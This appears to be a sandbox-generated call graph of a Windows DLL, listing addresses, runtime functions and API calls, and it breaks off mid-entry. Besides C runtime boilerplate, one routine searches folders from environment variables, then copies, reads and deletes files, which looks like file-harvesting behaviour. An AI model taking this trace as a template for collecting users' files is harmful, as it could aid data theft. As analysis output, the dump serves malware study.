7007 20ea2082 7023 20ea2308 7007->7023 7009 20ea2087 __RTC_Initialize 7026 20ea20c4 7009->7026 7011 20ea209f 7029 20ea260b 7011->7029 7015 20ea2451 ___scrt_release_startup_lock 7014->7015 7016 20ea2461 7015->7016 7017 20ea2455 7015->7017 7020 20ea246e 7016->7020 7021 20ea499b _abort 28 API calls 7016->7021 7018 20ea527a _abort 20 API calls 7017->7018 7019 20ea245f 7018->7019 7019->7007 7020->7007 7022 20ea4bbd 7021->7022 7022->7007 7039 20ea34c7 RtlInterlockedFlushSList 7023->7039 7025 20ea2312 7025->7009 7041 20ea246f 7026->7041 7028 20ea20c9 ___scrt_release_startup_lock 7028->7011 7030 20ea2617 7029->7030 7031 20ea262d 7030->7031 7069 20ea53ed 7030->7069 7031->7013 7036 20ea264e ___scrt_fastfail 7035->7036 7037 20ea26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7036->7037 7038 20ea2744 ___scrt_fastfail 7037->7038 7038->7006 7040 20ea34d7 7039->7040 7040->7025 7046 20ea53ff 7041->7046 7053 20ea5c2b 7046->7053 7049 20ea391b 7050 20ea354d 7049->7050 7051 20ea3925 7049->7051 7050->7028 7064 20ea3b2c 7051->7064 7054 20ea2476 7053->7054 7055 20ea5c35 7053->7055 7054->7049 7057 20ea5db2 7055->7057 7058 20ea5c45 _abort 5 API calls 7057->7058 7059 20ea5dd9 7058->7059 7060 20ea5df1 TlsFree 7059->7060 7061 20ea5de5 7059->7061 7060->7061 7062 20ea2ada _ValidateLocalCookies 5 API calls 7061->7062 7063 20ea5e02 7062->7063 7063->7054 7065 20ea3a82 try_get_function 5 API calls 7064->7065 7066 20ea3b46 7065->7066 7067 20ea3b5e TlsFree 7066->7067 7068 20ea3b52 7066->7068 7067->7068 7068->7050 7080 20ea74da 7069->7080 7072 20ea3529 7073 20ea3532 7072->7073 7079 20ea3543 7072->7079 7074 20ea391b ___vcrt_uninitialize_ptd 6 API calls 7073->7074 7075 20ea3537 7074->7075 7084 20ea3972 7075->7084 7079->7031 7081 20ea74f3 7080->7081 7082 20ea2ada _ValidateLocalCookies 5 API calls 7081->7082 7083 20ea2625 7082->7083 7083->7072 7085 20ea353c 7084->7085 7086 20ea397d 7084->7086 7088 20ea3c50 7085->7088 7087 20ea3987 RtlDeleteCriticalSection 7086->7087 7087->7085 7087->7087 7089 20ea3c7f 7088->7089 7091 20ea3c59 7088->7091 7089->7079 7090 20ea3c69 FreeLibrary 7090->7091 7091->7089 7091->7090 7092 20ea724e GetProcessHeap 7093 20ea284f 7096 20ea2882 7093->7096 7099 20ea3550 7096->7099 7098 20ea285d 7100 20ea358a 7099->7100 7101 20ea355d 7099->7101 7100->7098 7101->7100 7102 20ea47e5 ___std_exception_copy 21 API calls 7101->7102 7103 20ea357a 7102->7103 7103->7100 7104 20ea544d ___std_exception_copy 26 API calls 7103->7104 7104->7100 7145 20ea220c 7146 20ea221a dllmain_dispatch 7145->7146 7147 20ea2215 7145->7147 7149 20ea22b1 7147->7149 7150 20ea22c7 7149->7150 7152 20ea22d0 7150->7152 7153 20ea2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7150->7153 7152->7146 7153->7152 7784 20eaaf43 7785 20eaaf59 7784->7785 7786 20eaaf4d 7784->7786 7786->7785 7787 20eaaf52 CloseHandle 7786->7787 7787->7785 7902 20ea7103 GetCommandLineA GetCommandLineW 7903 20ea5303 7906 20ea50a5 7903->7906 7915 20ea502f 7906->7915 7909 20ea502f 5 API calls 7910 20ea50c3 7909->7910 7911 20ea5000 20 API calls 7910->7911 7912 20ea50ce 7911->7912 7913 20ea5000 20 API calls 7912->7913 7914 20ea50d9 7913->7914 7916 20ea5048 7915->7916 7917 20ea2ada _ValidateLocalCookies 5 API calls 7916->7917 7918 20ea5069 7917->7918 7918->7909 6916 20ea7a80 6917 20ea7a8d 6916->6917 6918 20ea637b _abort 20 API calls 6917->6918 6919 20ea7aa7 6918->6919 6920 20ea571e _free 20 API calls 6919->6920 6921 20ea7ab3 6920->6921 6922 20ea637b _abort 20 API calls 6921->6922 6926 20ea7ad9 6921->6926 6924 20ea7acd 6922->6924 6925 20ea571e _free 20 API calls 6924->6925 6925->6926 6927 20ea7ae5 6926->6927 6928 20ea5eb7 6926->6928 6929 20ea5c45 _abort 5 API calls 6928->6929 6930 20ea5ede 6929->6930 6931 20ea5efc InitializeCriticalSectionAndSpinCount 6930->6931 6932 20ea5ee7 6930->6932 6931->6932 6933 20ea2ada _ValidateLocalCookies 5 API calls 6932->6933 6934 20ea5f13 6933->6934 6934->6926 7105 20ea8640 7108 20ea8657 7105->7108 7109 20ea8679 7108->7109 7110 20ea8665 7108->7110 7112 20ea8693 7109->7112 7113 20ea8681 7109->7113 7111 20ea6368 _free 20 API calls 7110->7111 7114 20ea866a 7111->7114 7116 20ea54a7 __fassign 38 API calls 7112->7116 7120 20ea8652 7112->7120 7115 20ea6368 _free 20 API calls 7113->7115 7117 20ea62ac _abort 26 API calls 7114->7117 7118 20ea8686 7115->7118 7116->7120 7117->7120 7119 20ea62ac _abort 26 API calls 7118->7119 7119->7120 7245 20eaa1c6 IsProcessorFeaturePresent 7246 20ea7bc7 7247 20ea7bd3 ___scrt_is_nonwritable_in_current_image 7246->7247 7248 20ea7c0a _abort 7247->7248 7254 20ea5671 RtlEnterCriticalSection 7247->7254 7250 20ea7be7 7251 20ea7f86 __fassign 20 API calls 7250->7251 7252 20ea7bf7 7251->7252 7255 20ea7c10 7252->7255 7254->7250 7258 20ea56b9 RtlLeaveCriticalSection 7255->7258 7257 20ea7c17 7257->7248 7258->7257 7788 20eaa945 7790 20eaa96d 7788->7790 7789 20eaa9a5 7790->7789 7791 20eaa99e 7790->7791 7792 20eaa997 7790->7792 7797 20eaaa00 7791->7797 7793 20eaaa17 21 API calls 7792->7793 7795 20eaa99c 7793->7795 7798 20eaaa20 7797->7798 7799 20eab19b __startOneArgErrorHandling 21 API calls 7798->7799 7800 20eaa9a3 7799->7800 6935 20ea4a9a 6936 20ea5411 38 API calls 6935->6936 6937 20ea4aa2 6936->6937 5978 20ea1c5b 5979 20ea1c6b ___scrt_fastfail 5978->5979 5982 20ea12ee 5979->5982 5981 20ea1c87 5983 20ea1324 ___scrt_fastfail 5982->5983 5984 20ea13b7 GetEnvironmentVariableW 5983->5984 6008 20ea10f1 5984->6008 5987 20ea10f1 57 API calls 5988 20ea1465 5987->5988 5989 20ea10f1 57 API calls 5988->5989 5990 20ea1479 5989->5990 5991 20ea10f1 57 API calls 5990->5991 5992 20ea148d 5991->5992 5993 20ea10f1 57 API calls 5992->5993 5994 20ea14a1 5993->5994 5995 20ea10f1 57 API calls 5994->5995 5996 20ea14b5 lstrlenW 5995->5996 5997 20ea14d9 lstrlenW 5996->5997 5998 20ea14d2 5996->5998 5999 20ea10f1 57 API calls 5997->5999 5998->5981 6000 20ea1501 lstrlenW lstrcatW 5999->6000 6001 20ea10f1 57 API calls 6000->6001 6002 20ea1539 lstrlenW lstrcatW 6001->6002 6003 20ea10f1 57 API calls 6002->6003 6004 20ea156b lstrlenW lstrcatW 6003->6004 6005 20ea10f1 57 API calls 6004->6005 6006 20ea159d lstrlenW lstrcatW 6005->6006 6007 20ea10f1 57 API calls 6006->6007 6007->5998 6009 20ea1118 ___scrt_fastfail 6008->6009 6010 20ea1129 lstrlenW 6009->6010 6021 20ea2c40 6010->6021 6013 20ea1168 lstrlenW 6014 20ea1177 lstrlenW FindFirstFileW 6013->6014 6015 20ea11a0 6014->6015 6016 20ea11e1 6014->6016 6017 20ea11c7 FindNextFileW 6015->6017 6020 20ea11aa 6015->6020 6016->5987 6017->6015 6019 20ea11da FindClose 6017->6019 6019->6016 6020->6017 6023 20ea1000 6020->6023 6022 20ea1148 lstrcatW lstrlenW 6021->6022 6022->6013 6022->6014 6024 20ea1022 ___scrt_fastfail 6023->6024 6025 20ea10af 6024->6025 6026 20ea102f lstrcatW lstrlenW 6024->6026 6027 20ea10b5 lstrlenW 6025->6027 6039 20ea10ad 6025->6039 6028 20ea105a lstrlenW 6026->6028 6029 20ea106b lstrlenW 6026->6029 6054 20ea1e16 6027->6054 6028->6029 6040 20ea1e89 lstrlenW 6029->6040 6032 20ea10ca 6035 20ea1e89 5 API calls 6032->6035 6032->6039 6033 20ea1088 GetFileAttributesW 6034 20ea109c 6033->6034 6033->6039 6034->6039 6046 20ea173a 6034->6046 6036 20ea10df 6035->6036 6059 20ea11ea 6036->6059 6039->6020 6041 20ea2c40 ___scrt_fastfail 6040->6041 6042 20ea1ea7 lstrcatW lstrlenW 6041->6042 6043 20ea1ec2 6042->6043 6044 20ea1ed1 lstrcatW 6042->6044 6043->6044 6045 20ea1ec7 lstrlenW 6043->6045 6044->6033 6045->6044 6047 20ea1747 ___scrt_fastfail 6046->6047 6074 20ea1cca 6047->6074 6050 20ea199f 6050->6039 6052 20ea1824 ___scrt_fastfail _strlen 6052->6050 6094 20ea15da 6052->6094 6055 20ea1e29 6054->6055 6058 20ea1e4c 6054->6058 6056 20ea1e2d lstrlenW 6055->6056 6055->6058 6057 20ea1e3f lstrlenW 6056->6057 6056->6058 6057->6058 6058->6032 6060 20ea120e ___scrt_fastfail 6059->6060 6061 20ea1e89 5 API calls 6060->6061 6062 20ea1220 GetFileAttributesW 6061->6062 6063 20ea1246 6062->6063 6064 20ea1235 6062->6064 6065 20ea1e89 5 API calls 6063->6065 6064->6063 6066 20ea173a 35 API calls 6064->6066 6067 20ea1258 6065->6067 6066->6063 6068 20ea10f1 56 API calls 6067->6068 6069 20ea126d 6068->6069 6070 20ea1e89 5 API calls 6069->6070 6071 20ea127f ___scrt_fastfail 6070->6071 6072 20ea10f1 56 API calls 6071->6072 6073 20ea12e6 6072->6073 6073->6039 6075 20ea1cf1 ___scrt_fastfail 6074->6075 6076 20ea1d0f CopyFileW CreateFileW 6075->6076 6077 20ea1d44 DeleteFileW 6076->6077 6078 20ea1d55 GetFileSize 6076->6078 6083 20ea1808 6077->6083 6079 20ea1ede 22 API calls 6078->6079 6080 20ea1d66 ReadFile 6079->6080 6081 20ea1d7d CloseHandle DeleteFileW 6080->6081 6082 20ea1d94 CloseHandle DeleteFileW 6080->6082 6081->6083 6082->6083 6083->6050 6084 20ea1ede 6083->6084 6086 20ea222f 6084->6086 6087 20ea224e 6086->6087 6089 20ea2250 6086->6089 6102 20ea474f 6086->6102 6107 20ea47e5 6086->6107 6087->6052 6090 20ea2908 6089->6090 6114 20ea35d2 6089->6114 6091 20ea35d2 __CxxThrowException@8 RaiseException 6090->6091 6093 20ea2925 6091->6093 6093->6052 6095 20ea160c _strcat _strlen 6094->6095 6096 20ea163c lstrlenW 6095->6096 6202 20ea1c9d 6096->6202 6098 20ea1655 lstrcatW lstrlenW 6099 20ea1678 6098->6099 6100 20ea167e lstrcatW 6099->6100 6101 20ea1693 ___scrt_fastfail 6099->6101 6100->6101 6101->6052 6117 20ea4793 6102->6117 6104 20ea4765 6123 20ea2ada 6104->6123 6106 20ea478f 6106->6086 6113 20ea56d0 _abort 6107->6113 6108 20ea570e 6136 20ea6368 6108->6136 6109 20ea56f9 RtlAllocateHeap 6111 20ea570c 6109->6111 6109->6113 6111->6086 6112 20ea474f _abort 7 API calls 6112->6113 6113->6108 6113->6109 6113->6112 6115 20ea35f2 RaiseException 6114->6115 6115->6090 6118 20ea479f ___scrt_is_nonwritable_in_current_image 6117->6118 6130 20ea5671 RtlEnterCriticalSection 6118->6130 6120 20ea47aa 6131 20ea47dc 6120->6131 6122 20ea47d1 _abort 6122->6104 6124 20ea2ae3 6123->6124 6125 20ea2ae5 IsProcessorFeaturePresent 6123->6125 6124->6106 6127 20ea2b58 6125->6127 6135 20ea2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6127->6135 6129 20ea2c3b 6129->6106 6130->6120 6134 20ea56b9 RtlLeaveCriticalSection 6131->6134 6133 20ea47e3 6133->6122 6134->6133 6135->6129 6139 20ea5b7a GetLastError 6136->6139 6140 20ea5b99 6139->6140 6141 20ea5b93 6139->6141 6145 20ea5bf0 SetLastError 6140->6145 6165 20ea637b 6140->6165 6158 20ea5e08 6141->6158 6146 20ea5bf9 6145->6146 6146->6111 6150 20ea5bb9 6154 20ea5be7 SetLastError 6150->6154 6151 20ea5bcf 6185 20ea593c 6151->6185 6152 20ea5bb3 6172 20ea571e 6152->6172 6154->6146 6156 20ea571e _free 17 API calls 6157 20ea5be0 6156->6157 6157->6145 6157->6154 6190 20ea5c45 6158->6190 6160 20ea5e2f 6161 20ea5e47 TlsGetValue 6160->6161 6164 20ea5e3b 6160->6164 6161->6164 6162 20ea2ada _ValidateLocalCookies 5 API calls 6163 20ea5e58 6162->6163 6163->6140 6164->6162 6171 20ea6388 _abort 6165->6171 6166 20ea63c8 6168 20ea6368 _free 19 API calls 6166->6168 6167 20ea63b3 RtlAllocateHeap 6169 20ea5bab 6167->6169 6167->6171 6168->6169 6169->6152 6178 20ea5e5e 6169->6178 6170 20ea474f _abort 7 API calls 6170->6171 6171->6166 6171->6167 6171->6170 6173 20ea5729 HeapFree 6172->6173 6174 20ea5752 _free 6172->6174 6173->6174 6175 20ea573e 6173->6175 6174->6150 6176 20ea6368 _free 18 API calls 6175->6176 6177 20ea5744 GetLastError 6176->6177 6177->6174 6179 20ea5c45 _abort 5 API calls 6178->6179 6180 20ea5e85 6179->6180 6181 20ea5ea0 TlsSetValue 6180->6181 6182 20ea5e94 6180->6182 6181->6182 6183 20ea2ada _ValidateLocalCookies 5 API calls 6182->6183 6184 20ea5bc8 6183->6184 6184->6151 6184->6152 6196 20ea5914 6185->6196 6191 20ea5c71 6190->6191 6192 20ea5c75 __crt_fast_encode_pointer 6190->6192 6191->6192 6193 20ea5ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6191->6193 6195 20ea5c95 6191->6195 6192->6160 6193->6191 6194 20ea5ca1 GetProcAddress 6194->6192 6195->6192 6195->6194 6197 20ea5854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6196->6197 6198 20ea5938 6197->6198 6199 20ea58c4 6198->6199 6200 20ea5758 _abort 20 API calls 6199->6200 6201 20ea58e8 6200->6201 6201->6156 6203 20ea1ca6 _strlen 6202->6203 6203->6098 6236 20ea20db 6239 20ea20e7 ___scrt_is_nonwritable_in_current_image 6236->6239 6237 20ea20f6 6238 20ea2110 dllmain_raw 6238->6237 6240 20ea212a 6238->6240 6239->6237 6239->6238 6242 20ea210b 6239->6242 6249 20ea1eec 6240->6249 6242->6237 6243 20ea2177 6242->6243 6246 20ea1eec 31 API calls 6242->6246 6243->6237 6244 20ea1eec 31 API calls 6243->6244 6245 20ea218a 6244->6245 6245->6237 6247 20ea2193 dllmain_raw 6245->6247 6248 20ea216d dllmain_raw 6246->6248 6247->6237 6248->6243 6250 20ea1f2a dllmain_crt_process_detach 6249->6250 6251 20ea1ef7 6249->6251 6254 20ea1f06 6250->6254 6252 20ea1f1c dllmain_crt_process_attach 6251->6252 6253 20ea1efc 6251->6253 6252->6254 6255 20ea1f12 6253->6255 6256 20ea1f01 6253->6256 6254->6242 6264 20ea23ec 6255->6264 6256->6254 6259 20ea240b 6256->6259 6272 20ea53e5 6259->6272 6411 20ea3513 6264->6411 6267 20ea23f5 6267->6254 6270 20ea2408 6270->6254 6271 20ea351e 7 API calls 6271->6267 6278 20ea5aca 6272->6278 6275 20ea351e 6382 20ea3820 6275->6382 6277 20ea2415 6277->6254 6279 20ea5ad4 6278->6279 6280 20ea2410 6278->6280 6281 20ea5e08 _abort 11 API calls 6279->6281 6280->6275 6282 20ea5adb 6281->6282 6282->6280 6283 20ea5e5e _abort 11 API calls 6282->6283 6284 20ea5aee 6283->6284 6286 20ea59b5 6284->6286 6287 20ea59d0 6286->6287 6288 20ea59c0 6286->6288 6287->6280 6292 20ea59d6 6288->6292 6291 20ea571e _free 20 API calls 6291->6287 6293 20ea59e9 6292->6293 6294 20ea59ef 6292->6294 6295 20ea571e _free 20 API calls 6293->6295 6296 20ea571e _free 20 API calls 6294->6296 6295->6294 6297 20ea59fb 6296->6297 6298 20ea571e _free 20 API calls 6297->6298 6299 20ea5a06 6298->6299 6300 20ea571e _free 20 API calls 6299->6300 6301 20ea5a11 6300->6301 6302 20ea571e _free 20 API calls 6301->6302 6303 20ea5a1c 6302->6303 6304 20ea571e _free 20 API calls 6303->6304 6305 20ea5a27 6304->6305 6306 20ea571e _free 20 API calls 6305->6306 6307 20ea5a32 6306->6307 6308 20ea571e _free 20 API calls 6307->6308 6309 20ea5a3d 6308->6309 6310 20ea571e _free 20 API calls 6309->6310 6311 20ea5a48 6310->6311 6312 20ea571e _free 20 API calls 6311->6312 6313 20ea5a56 6312->6313 6318 20ea589c 6313->6318 6324 20ea57a8 6318->6324 6320 20ea58c0 6321 20ea58ec 6320->6321 6337 20ea5809 6321->6337 6323 20ea5910 6323->6291 6325 20ea57b4 ___scrt_is_nonwritable_in_current_image 6324->6325 6332 20ea5671 RtlEnterCriticalSection 6325->6332 6327 20ea57be 6330 20ea571e _free 20 API calls 6327->6330 6331 20ea57e8 6327->6331 6329 20ea57f5 _abort 6329->6320 6330->6331 6333 20ea57fd 6331->6333 6332->6327 6336 20ea56b9 RtlLeaveCriticalSection 6333->6336 6335 20ea5807 6335->6329 6336->6335 6338 20ea5815 ___scrt_is_nonwritable_in_current_image 6337->6338 6345 20ea5671 RtlEnterCriticalSection 6338->6345 6340 20ea581f 6346 20ea5a7f 6340->6346 6342 20ea5832 6350 20ea5848 6342->6350 6344 20ea5840 _abort 6344->6323 6345->6340 6347 20ea5ab5 __fassign 6346->6347 6348 20ea5a8e __fassign 6346->6348 6347->6342 6348->6347 6353 20ea7cc2 6348->6353 6381 20ea56b9 RtlLeaveCriticalSection 6350->6381 6352 20ea5852 6352->6344 6354 20ea7d42 6353->6354 6360 20ea7cd8 6353->6360 6355 20ea7d90 6354->6355 6357 20ea571e _free 20 API calls 6354->6357 6356 20ea7e35 __fassign 20 API calls 6355->6356 6377 20ea7d9e 6356->6377 6359 20ea7d64 6357->6359 6358 20ea7d0b 6361 20ea7d2d 6358->6361 6369 20ea571e _free 20 API calls 6358->6369 6362 20ea571e _free 20 API calls 6359->6362 6360->6354 6360->6358 6364 20ea571e _free 20 API calls 6360->6364 6363 20ea571e _free 20 API calls 6361->6363 6365 20ea7d77 6362->6365 6366 20ea7d37 6363->6366 6368 20ea7d00 6364->6368 6370 20ea571e _free 20 API calls 6365->6370 6371 20ea571e _free 20 API calls 6366->6371 6367 20ea7dfe 6372 20ea571e _free 20 API calls 6367->6372 6373 20ea90ba ___free_lconv_mon 20 API calls 6368->6373 6374 20ea7d22 6369->6374 6375 20ea7d85 6370->6375 6371->6354 6376 20ea7e04 6372->6376 6373->6358 6378 20ea91b8 __fassign 20 API calls 6374->6378 6379 20ea571e _free 20 API calls 6375->6379 6376->6347 6377->6367 6380 20ea571e 20 API calls _free 6377->6380 6378->6361 6379->6355 6380->6377 6381->6352 6383 20ea382d 6382->6383 6387 20ea384b ___vcrt_freefls@4 6382->6387 6384 20ea383b 6383->6384 6388 20ea3b67 6383->6388 6393 20ea3ba2 6384->6393 6387->6277 6398 20ea3a82 6388->6398 6390 20ea3b81 6391 20ea3b99 TlsGetValue 6390->6391 6392 20ea3b8d 6390->6392 6391->6392 6392->6384 6394 20ea3a82 try_get_function 5 API calls 6393->6394 6395 20ea3bbc 6394->6395 6396 20ea3bd7 TlsSetValue 6395->6396 6397 20ea3bcb 6395->6397 6396->6397 6397->6387 6399 20ea3aaa 6398->6399 6403 20ea3aa6 __crt_fast_encode_pointer 6398->6403 6399->6403 6404 20ea39be 6399->6404 6402 20ea3ac4 GetProcAddress 6402->6403 6403->6390 6407 20ea39cd try_get_first_available_module 6404->6407 6405 20ea3a77 6405->6402 6405->6403 6406 20ea39ea LoadLibraryExW 6406->6407 6408 20ea3a05 GetLastError 6406->6408 6407->6405 6407->6406 6409 20ea3a60 FreeLibrary 6407->6409 6410 20ea3a38 LoadLibraryExW 6407->6410 6408->6407 6409->6407 6410->6407 6417 20ea3856 6411->6417 6413 20ea23f1 6413->6267 6414 20ea53da 6413->6414 6415 20ea5b7a _abort 20 API calls 6414->6415 6416 20ea23fd 6415->6416 6416->6270 6416->6271 6418 20ea385f 6417->6418 6419 20ea3862 GetLastError 6417->6419 6418->6413 6420 20ea3b67 ___vcrt_FlsGetValue 6 API calls 6419->6420 6423 20ea3877 6420->6423 6421 20ea3896 6422 20ea38dc SetLastError 6421->6422 6422->6413 6423->6421 6423->6422 6424 20ea3ba2 ___vcrt_FlsSetValue 6 API calls 6423->6424 6425 20ea3890 6424->6425 6425->6421 6426 20ea38b8 6425->6426 6427 20ea3ba2 ___vcrt_FlsSetValue 6 API calls 6425->6427 6426->6421 6428 20ea3ba2 ___vcrt_FlsSetValue 6 API calls 6426->6428 6427->6426 6428->6421 7154 20ea2418 7155 20ea2420 ___scrt_release_startup_lock 7154->7155 7158 20ea47f5 7155->7158 7157 20ea2448 7159 20ea4808 7158->7159 7160 20ea4804 7158->7160 7163 20ea4815 7159->7163 7160->7157 7164 20ea5b7a _abort 20 API calls 7163->7164 7167 20ea482c 7164->7167 7165 20ea2ada _ValidateLocalCookies 5 API calls 7166 20ea4811 7165->7166 7166->7157 7167->7165 7168 20ea281c 7169 20ea2882 std::exception::exception 27 API calls 7168->7169 7170 20ea282a 7169->7170 7259 20ea4bdd 7260 20ea4c08 7259->7260 7261 20ea4bec 7259->7261 7263 20ea6d60 51 API calls 7260->7263 7261->7260 7262 20ea4bf2 7261->7262 7264 20ea6368 _free 20 API calls 7262->7264 7265 20ea4c0f GetModuleFileNameA 7263->7265 7266 20ea4bf7 7264->7266 7267 20ea4c33 7265->7267 7268 20ea62ac _abort 26 API calls 7266->7268 7282 20ea4d01 7267->7282 7269 20ea4c01 7268->7269 7272 20ea4e76 20 API calls 7273 20ea4c5d 7272->7273 7274 20ea4c72 7273->7274 7275 20ea4c66 7273->7275 7277 20ea4d01 38 API calls 7274->7277 7276 20ea6368 _free 20 API calls 7275->7276 7281 20ea4c6b 7276->7281 7279 20ea4c88 7277->7279 7278 20ea571e _free 20 API calls 7278->7269 7280 20ea571e _free 20 API calls 7279->7280 7279->7281 7280->7281 7281->7278 7284 20ea4d26 7282->7284 7287 20ea4d86 7284->7287 7288 20ea70eb 7284->7288 7285 20ea4c50 7285->7272 7286 20ea70eb 38 API calls 7286->7287 7287->7285 7287->7286 7291 20ea7092 7288->7291 7292 20ea54a7 __fassign 38 API calls 7291->7292 7293 20ea70a6 7292->7293 7293->7284 6429 20ea36d0 6430 20ea36e2 6429->6430 6432 20ea36f0 @_EH4_CallFilterFunc@8 6429->6432 6431 20ea2ada _ValidateLocalCookies 5 API calls 6430->6431 6431->6432 6938 20ea3c90 RtlUnwind 7801 20ea5351 7802 20ea5374 7801->7802 7803 20ea5360 7801->7803 7804 20ea571e _free 20 API calls 7802->7804 7803->7802 7805 20ea571e _free 20 API calls 7803->7805 7806 20ea5386 7804->7806 7805->7802 7807 20ea571e _free 20 API calls 7806->7807 7808 20ea5399 7807->7808 7809 20ea571e _free 20 API calls 7808->7809 7810 20ea53aa 7809->7810 7811 20ea571e _free 20 API calls 7810->7811 7812 20ea53bb 7811->7812 6433 20ea4ed7 6444 20ea6d60 6433->6444 6438 20ea4ef4 6440 20ea571e _free 20 API calls 6438->6440 6441 20ea4f29 6440->6441 6442 20ea4eff 6443 20ea571e _free 20 API calls 6442->6443 6443->6438 6445 20ea4ee9 6444->6445 6446 20ea6d69 6444->6446 6448 20ea7153 GetEnvironmentStringsW 6445->6448 6477 20ea6c5f 6446->6477 6449 20ea716a 6448->6449 6459 20ea71bd 6448->6459 6452 20ea7170 WideCharToMultiByte 6449->6452 6450 20ea4eee 6450->6438 6460 20ea4f2f 6450->6460 6451 20ea71c6 FreeEnvironmentStringsW 6451->6450 6453 20ea718c 6452->6453 6452->6459 6454 20ea56d0 21 API calls 6453->6454 6455 20ea7192 6454->6455 6456 20ea7199 WideCharToMultiByte 6455->6456 6457 20ea71af 6455->6457 6456->6457 6458 20ea571e _free 20 API calls 6457->6458 6458->6459 6459->6450 6459->6451 6463 20ea4f44 6460->6463 6461 20ea637b _abort 20 API calls 6472 20ea4f6b 6461->6472 6462 20ea4fcf 6464 20ea571e _free 20 API calls 6462->6464 6463->6461 6465 20ea4fe9 6464->6465 6465->6442 6466 20ea637b _abort 20 API calls 6466->6472 6467 20ea4fd1 6886 20ea5000 6467->6886 6471 20ea571e _free 20 API calls 6471->6462 6472->6462 6472->6466 6472->6467 6473 20ea4ff3 6472->6473 6475 20ea571e _free 20 API calls 6472->6475 6877 20ea544d 6472->6877 6474 20ea62bc _abort 11 API calls 6473->6474 6476 20ea4fff 6474->6476 6475->6472 6497 20ea5af6 GetLastError 6477->6497 6479 20ea6c6c 6517 20ea6d7e 6479->6517 6481 20ea6c74 6526 20ea69f3 6481->6526 6484 20ea6c8b 6484->6445 6487 20ea6cce 6490 20ea571e _free 20 API calls 6487->6490 6490->6484 6491 20ea6cc9 6492 20ea6368 _free 20 API calls 6491->6492 6492->6487 6493 20ea6d12 6493->6487 6550 20ea68c9 6493->6550 6494 20ea6ce6 6494->6493 6495 20ea571e _free 20 API calls 6494->6495 6495->6493 6498 20ea5b12 6497->6498 6499 20ea5b0c 6497->6499 6501 20ea637b _abort 20 API calls 6498->6501 6503 20ea5b61 SetLastError 6498->6503 6500 20ea5e08 _abort 11 API calls 6499->6500 6500->6498 6502 20ea5b24 6501->6502 6504 20ea5e5e _abort 11 API calls 6502->6504 6509 20ea5b2c 6502->6509 6503->6479 6506 20ea5b41 6504->6506 6505 20ea571e _free 20 API calls 6507 20ea5b32 6505->6507 6508 20ea5b48 6506->6508 6506->6509 6511 20ea5b6d SetLastError 6507->6511 6510 20ea593c _abort 20 API calls 6508->6510 6509->6505 6512 20ea5b53 6510->6512 6553 20ea55a8 6511->6553 6514 20ea571e _free 20 API calls 6512->6514 6516 20ea5b5a 6514->6516 6516->6503 6516->6511 6518 20ea6d8a ___scrt_is_nonwritable_in_current_image 6517->6518 6519 20ea5af6 _abort 38 API calls 6518->6519 6520 20ea6d94 6519->6520 6522 20ea55a8 _abort 38 API calls 6520->6522 6524 20ea6e18 _abort 6520->6524 6525 20ea571e _free 20 API calls 6520->6525 6726 20ea5671 RtlEnterCriticalSection 6520->6726 6727 20ea6e0f 6520->6727 6522->6520 6524->6481 6525->6520 6731 20ea54a7 6526->6731 6529 20ea6a26 6531 20ea6a2b GetACP 6529->6531 6532 20ea6a3d 6529->6532 6530 20ea6a14 GetOEMCP 6530->6532 6531->6532 6532->6484 6533 20ea56d0 6532->6533 6534 20ea570e 6533->6534 6535 20ea56de _abort 6533->6535 6537 20ea6368 _free 20 API calls 6534->6537 6535->6534 6536 20ea56f9 RtlAllocateHeap 6535->6536 6539 20ea474f _abort 7 API calls 6535->6539 6536->6535 6538 20ea570c 6536->6538 6537->6538 6538->6487 6540 20ea6e20 6538->6540 6539->6535 6541 20ea69f3 40 API calls 6540->6541 6542 20ea6e3f 6541->6542 6545 20ea6e90 IsValidCodePage 6542->6545 6547 20ea6e46 6542->6547 6548 20ea6eb5 ___scrt_fastfail 6542->6548 6543 20ea2ada _ValidateLocalCookies 5 API calls 6544 20ea6cc1 6543->6544 6544->6491 6544->6494 6546 20ea6ea2 GetCPInfo 6545->6546 6545->6547 6546->6547 6546->6548 6547->6543 6768 20ea6acb GetCPInfo 6548->6768 6841 20ea6886 6550->6841 6552 20ea68ed 6552->6487 6564 20ea7613 6553->6564 6556 20ea55b8 6557 20ea55c2 IsProcessorFeaturePresent 6556->6557 6558 20ea55e0 6556->6558 6560 20ea55cd 6557->6560 6600 20ea4bc1 6558->6600 6594 20ea60e2 6560->6594 6603 20ea7581 6564->6603 6567 20ea766e 6568 20ea767a _abort 6567->6568 6569 20ea5b7a _abort 20 API calls 6568->6569 6572 20ea76a7 _abort 6568->6572 6575 20ea76a1 _abort 6568->6575 6569->6575 6570 20ea76f3 6571 20ea6368 _free 20 API calls 6570->6571 6573 20ea76f8 6571->6573 6579 20ea771f 6572->6579 6620 20ea5671 RtlEnterCriticalSection 6572->6620 6617 20ea62ac 6573->6617 6575->6570 6575->6572 6593 20ea76d6 6575->6593 6580 20ea777e 6579->6580 6582 20ea7776 6579->6582 6590 20ea77a9 6579->6590 6621 20ea56b9 RtlLeaveCriticalSection 6579->6621 6580->6590 6622 20ea7665 6580->6622 6585 20ea4bc1 _abort 28 API calls 6582->6585 6585->6580 6587 20ea5af6 _abort 38 API calls 6591 20ea780c 6587->6591 6589 20ea7665 _abort 38 API calls 6589->6590 6625 20ea782e 6590->6625 6592 20ea5af6 _abort 38 API calls 6591->6592 6591->6593 6592->6593 6629 20eabdc9 6593->6629 6595 20ea60fe ___scrt_fastfail 6594->6595 6596 20ea612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6595->6596 6599 20ea61fb ___scrt_fastfail 6596->6599 6597 20ea2ada _ValidateLocalCookies 5 API calls 6598 20ea6219 6597->6598 6598->6558 6599->6597 6648 20ea499b 6600->6648 6606 20ea7527 6603->6606 6605 20ea55ad 6605->6556 6605->6567 6607 20ea7533 ___scrt_is_nonwritable_in_current_image 6606->6607 6612 20ea5671 RtlEnterCriticalSection 6607->6612 6609 20ea7541 6613 20ea7575 6609->6613 6611 20ea7568 _abort 6611->6605 6612->6609 6616 20ea56b9 RtlLeaveCriticalSection 6613->6616 6615 20ea757f 6615->6611 6616->6615 6632 20ea6231 6617->6632 6619 20ea62b8 6619->6593 6620->6579 6621->6582 6623 